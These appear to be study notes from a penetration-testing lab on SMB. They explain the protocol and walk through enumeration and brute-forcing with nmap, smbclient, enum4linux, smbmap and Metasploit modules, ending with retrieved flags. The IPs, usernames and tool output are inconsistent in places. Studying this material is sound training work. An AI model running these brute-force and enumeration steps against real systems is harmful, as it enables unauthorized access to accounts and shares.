SMB stands for Server Message Block, and it's a network protocol used for sharing files, printers, and other resources between computers on a network. It enables devices to communicate and collaborate by providing a way to access shared folders, files, and other resources on remote systems. SMB is primarily used in Windows environments, but it's also supported by various other operating systems.
Here are some key features and uses of the SMB protocol:
File and Printer Sharing: SMB allows computers to share files and printers over a network. Users can access remote files as if they were on their local machine and send print jobs to remote printers.
Access Control: SMB supports access control and authentication mechanisms, allowing administrators to set permissions for who can access shared resources and what level of access they have.
Named Pipes and Interprocess Communication: SMB provides named pipes for interprocess communication between programs running on different computers. This facilitates communication and data exchange between applications.
Network Browsing: SMB enables network browsing, allowing users to discover available computers, shared folders, and resources on the network.
Remote Procedure Calls (RPCs): SMB can be used for remote procedure calls, which enable a program to execute code on a remote server as if it were local.
Version History: SMB has gone through several versions, including SMB1, SMB2, and SMB3. Each version introduced improvements in terms of security, performance, and functionality.
Encryption and Security: Recent versions of SMB (SMB3) incorporate advanced security features such as encryption, signing, and improved authentication mechanisms to enhance the protection of data in transit.
Cross-Platform Support: While SMB is closely associated with Windows, it is supported on various platforms through different implementations. For example, Samba is an open-source implementation of the SMB/CIFS protocol that allows Unix-like systems to share resources with Windows systems.
CIFS: Common Internet File System (CIFS) is a more advanced version of SMB that provides additional features and better compatibility with modern network environments.
SMB Enumeration
SMB enumeration refers to the process of extracting information and details from a target system that is running the Server Message Block (SMB) protocol. SMB is a network file sharing protocol that enables applications and systems to communicate and share resources such as files, printers, and other devices across a network. SMB is commonly used in Windows environments for sharing files and resources.
During SMB enumeration, a penetration tester or security analyst attempts to retrieve valuable information from the target system by querying the SMB services. This process involves querying various aspects of the system, including:
Shares: Enumerating the shared folders and resources on the target system, which can reveal information about directory structures, file names, and access permissions.
Users and Groups: Extracting information about users and groups present on the system. This information can help identify potential user accounts for further exploitation.
Services: Identifying active services, applications, and processes running on the target system, which could potentially lead to vulnerabilities or weaknesses.
Session Information: Gathering details about active user sessions and connections to the target system.
System Information: Extracting information about the target system's operating system, version, and other configuration details.
Security Policies: Obtaining information about security policies, such as password policies, that could impact the strength of user credentials.
Error Messages: Analyzing error messages or responses from the SMB service, which might provide insights into potential misconfigurations or vulnerabilities.
SMB Ports
TCP Port 445 - Microsoft-DS (Microsoft Directory Services): This is the main port used for SMB traffic on modern networks. It is commonly used for file and printer sharing, as well as other SMB-related operations.
UDP Port 137 - NetBIOS Name Service: This port is used for the NetBIOS Name Resolution service. NetBIOS (Network Basic Input/Output System) is a service that allows computers to communicate within a local network. This port is involved in resolving NetBIOS names to IP addresses.
UDP Port 138 - NetBIOS Datagram Service: This port is used for the NetBIOS Datagram Service. It is involved in the communication of datagrams between devices on the network.
TCP Port 139 - NetBIOS Session Service: In the past, this port was widely used for SMB traffic, but it has become less common in modern networks. It was used for file access operations and resource sharing.
SMB: Windows Discover & Mount
Task List
Windows machine (Server 2012) is provided to you.
Learn to use Nmap to scan the target machine and mount the SMB share of the target machine using the Windows File Explorer as well as using the command prompt.
Objective: Discover SMB share and mount it
The following username and password may be used to access the service:
Numerous iterations of the SMB protocol exist, including SMBv1, CIFS, SMBv2, SMBv2.1, SMBv3, and others.
For instance, Windows employs SMB for mapping and sharing drives as letters.
Typically, SMB is detectable on ports 139 or 445; additional details about the operating system version can be unveiled through nmap service and script enumeration (-sV, -sC).
Once SMB is identified during port scanning, employ nmap to amass further insights.
# nmap logged in as the "guest" accountHostscriptresults:|smb-enum-sessions:|Usersloggedin|_WIN-OMCNBKR66MN\bobsince<unknown># bob is logged in without any credentials, since the "guest login" is enabled
Use the provided user and password to enumerate the same login sessions
Use the Metasploit Framework and its msfconsole interface tool to enumerate samba version.
msfconsole
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.28.157.45
RHOSTS => 192.28.157.45
exploit
[*] 192.28.157.45:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)
[*] 192.28.157.45:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
nmblookup
nmblookup - NetBIOS over TCP/IP client used to lookup NetBIOS names
nmblookup -A 192.28.157.45
Looking up status of 192.28.157.45
SAMBA-RECON <00> - H <ACTIVE>
SAMBA-RECON <03> - H <ACTIVE>
SAMBA-RECON <20> - H <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>
RECONLABS <00> - <GROUP> H <ACTIVE>
RECONLABS <1d> - H <ACTIVE>
RECONLABS <1e> - <GROUP> H <ACTIVE>
MAC Address = 00-00-00-00-00-00
smbclient - ftp-like client to access SMB/CIFS resources on servers
smbclient -L 192.28.157.45 -N
# -L = list available services
# -N = no password prompt
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
enum4linux - tool for enumerating data from Windows and Samba hosts
enum4linux -o 192.230.128.82
==========================
| Target Information |
==========================
Target ........... 192.230.128.82
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.230.128.82 |
=====================================================
[+] Got domain/workgroup name: RECONLABS
======================================
| Session Check on 192.230.128.82 |
======================================
[+] Server 192.230.128.3 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.230.128.82 |
============================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.230.128.82 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.230.128.82 from smbclient:
[+] Got OS info for 192.230.128.82 from srvinfo:
SAMBA-RECON Wk Sv PrQ Unx NT SNT samba.recon.lab
platform_id : 500
os version : 6.1
server type : 0x809a03
Find samba server description
smbclient -L 192.230.128.82 -N
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
Host script results:
| smb-enum-users:
| SAMBA-RECON\admin (RID: 1005)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\aisha (RID: 1004)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\elie (RID: 1002)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\emma (RID: 1003)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\john (RID: 1000)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\shawn (RID: 1001)
| Full name:
| Description:
|_ Flags: Normal user account
enum4linux -U 192.230.128.82
==========================
| Target Information |
==========================
Target ........... 192.230.128.82
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.230.128.82 |
=====================================================
[+] Got domain/workgroup name: RECONLABS
======================================
| Session Check on 192.230.128.82 |
======================================
[+] Server 192.230.128.82 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.230.128.82 |
============================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==============================
| Users on 192.230.128.82 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: john Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elie Name: Desc:
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: aisha Name: Desc:
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: shawn Name: Desc:
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: emma Name: Desc:
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: admin Name: Desc:
user:[john] rid:[0x3e8]
user:[elie] rid:[0x3ea]
user:[aisha] rid:[0x3ec]
user:[shawn] rid:[0x3e9]
user:[emma] rid:[0x3eb]
user:[admin] rid:[0x3ed]
=========================================
| Share Enumeration on 192.187.39.6 |
=========================================
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
[+] Attempting to map shares on 192.187.39.6
//192.187.39.3/public Mapping: OK, Listing: OK
//192.187.39.3/john Mapping: DENIED, Listing: N/A
//192.187.39.3/aisha Mapping: DENIED, Listing: N/A
//192.187.39.3/emma Mapping: DENIED, Listing: N/A
//192.187.39.3/everyone Mapping: DENIED, Listing: N/A
//192.187.39.3/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smbclient -L 192.187.39.6 -N
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
Find domain groups on the samba server
enum4linux -G 192.187.39.6
==============================
| Groups on 192.187.39.6 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
group:[Testing] rid:[0x3f0]
[+] Getting local group memberships:
[+] Getting domain groups:
group:[Maintainer] rid:[0x3ee]
group:[Reserved] rid:[0x3ef]
[+] Getting domain group memberships:
enum4linux complete on Tue Feb 14 22:13:33 2023
📌 Available domain groups are Maintainer, Reserved
Check if samba server is configured for printing
enum4linux -i 192.187.39.6
=============================================
| Getting printer info for 192.187.39.6 |
=============================================
No printers returned.
📌 No printers returned.
smbclient //192.187.39.6/public -N
smb: \> ls
. D 0 Tue Feb 14 21:58:47 2023
.. D 0 Tue Nov 27 13:36:13 2018
secret D 0 Tue Nov 27 13:36:13 2018
dev D 0 Tue Nov 27 13:36:13 2018
# ls command
📌 There are 2 directories present inside public share: secret and dev
smb: \> cd secret
smb: \secret\> ls
. D 0 Tue Nov 27 13:36:13 2018
.. D 0 Tue Feb 14 21:58:47 2023
flag N 33 Tue Nov 27 13:36:13 2018
1981084628 blocks of size 1024. 39614508 blocks available
smb: \secret\> get flag
getting file \secret\flag of size 33 as flag (32.2 KiloBytes/sec) (average 32.2 KiloBytes/sec)
smb: \secret\> exit
root@attackdefense:~# cat flag
Word lists are lists of already known and used passwords, some of them leaked from breached websites or other services. Those passwords can be used as part of the attack via brute force tools.
In Kali Linux wordlists can be found inside /usr/share/wordlists directory.
gzip -d /usr/share/wordlists/rockyou.txt.gz
# Unzip rockyou.txt list
ip -br -c a
eth1@if108489 UP 192.174.58.5/24
Target IP is 192.174.58.6
nmap 192.174.58.6
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Use smb_login metasploit module to bruteforce jane's password
msfconsole
use auxiliary/scanner/smb/smb_login
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set SMBUser jane
set RHOSTS 192.174.58.6
exploit
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.174.58.6:445/
[445][smb] host: 192.174.58.6 login: admin password: password1
1 of 1 target successfully completed, 1 valid password found
📌 admin's password is password1
Find smb shares using found credentials
smbmap -u admin -p password1 -H 192.174.58.6
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.174.58.6...
[+] IP: 192.174.58.6:445 Name: target-1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
📌 Read-only share is nancy
smbclient -L 192.28.157.6 -U jane
# Use "abc123" password
smbclient //192.174.58.6/jane -U jane
smb: \> ls
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
admin D 0 Tue Nov 27 19:25:12 2018
logs D 0 Tue Nov 27 19:25:12 2018
flag D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 48016456 blocks available
smb: \> pwd
Current directory is \\192.174.58.6\jane\
📌 jane's share is not browsable but it exists.
smbclient //192.174.58.6/admin -U admin
# Use "password1" password
smb: \> ls
smb: \> cd hidden
smb: \hidden\> ls
smb: \hidden\> get flag.tar.gz
smb: \hidden\> exit
root@attackdefense:~# tar -xf flag.tar.gz
root@attackdefense:~# cat flag
smb: \> cd secret
smb: \secret\> ls
. D 0 Tue Nov 27 13:36:13 2018
.. D 0 Tue Feb 14 21:58:47 2023
flag N 33 Tue Nov 27 13:36:13 2018
1981084628 blocks of size 1024. 39614508 blocks available
smb: \secret\> get flag
getting file \secret\flag of size 33 as flag (32.2 KiloBytes/sec) (average 32.2 KiloBytes/sec)
smb: \secret\> exit
root@attackdefense:~# cat flag
Reveal Flag: 🚩
2727069bc058053bd561ce372721c92e
A named pipe is a logical connection between a client and server involved in a SMB connection, similar to an open TCP port.
Use pipe_auditor metasploit module to enumerate the named pipes
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set SMBUser admin
set SMBPass password1
set RHOSTS 192.174.58.6
exploit
